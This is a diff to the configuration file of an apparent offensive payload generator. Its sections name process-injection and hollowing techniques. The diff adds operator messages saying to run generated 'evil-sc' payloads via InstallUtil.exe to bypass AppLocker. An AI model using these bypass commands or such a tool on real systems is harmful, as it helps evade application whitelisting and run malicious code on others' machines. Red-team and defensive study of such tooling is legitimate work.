--- a/core/config/config.ini
+++ b/core/config/config.ini
@@ -87,20 +87,19 @@ output_format = .exe
 expected_format = RAW_BIN
 output_format = .dll
 compiler_args = -r:System.Configuration.Install
-custom_output = Custom Output
-
+custom_output = Run it using InstallUtil (AppLocker Bypass): "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false evil-sc.dll"
 
 [windows_cs:InstallUtilHollow]
 expected_format = RAW_BIN
 output_format = .exe
 compiler_args = -r:System.Configuration.Install
+custom_output = You may run this payload normaly: "evil-sc.exe" \nOr using installUtil to bypass AppLocker: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false evil-sc.exe"
 
 [windows_cs:InstallUtilPwsh]
 expected_format = RAW_BIN
 output_format = .exe
 compiler_args = -r:System.Configuration.Install -r:core/templates/headers/System.Management.Automation.dll
-custom_output = Custom \nOutput
-
+custom_output = Run it using InstallUtil (AppLocker Bypass): "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false evil-sc.exe"
 
 [windows_cs:NtMapViewOfSection]
 expected_format = RAW_BIN
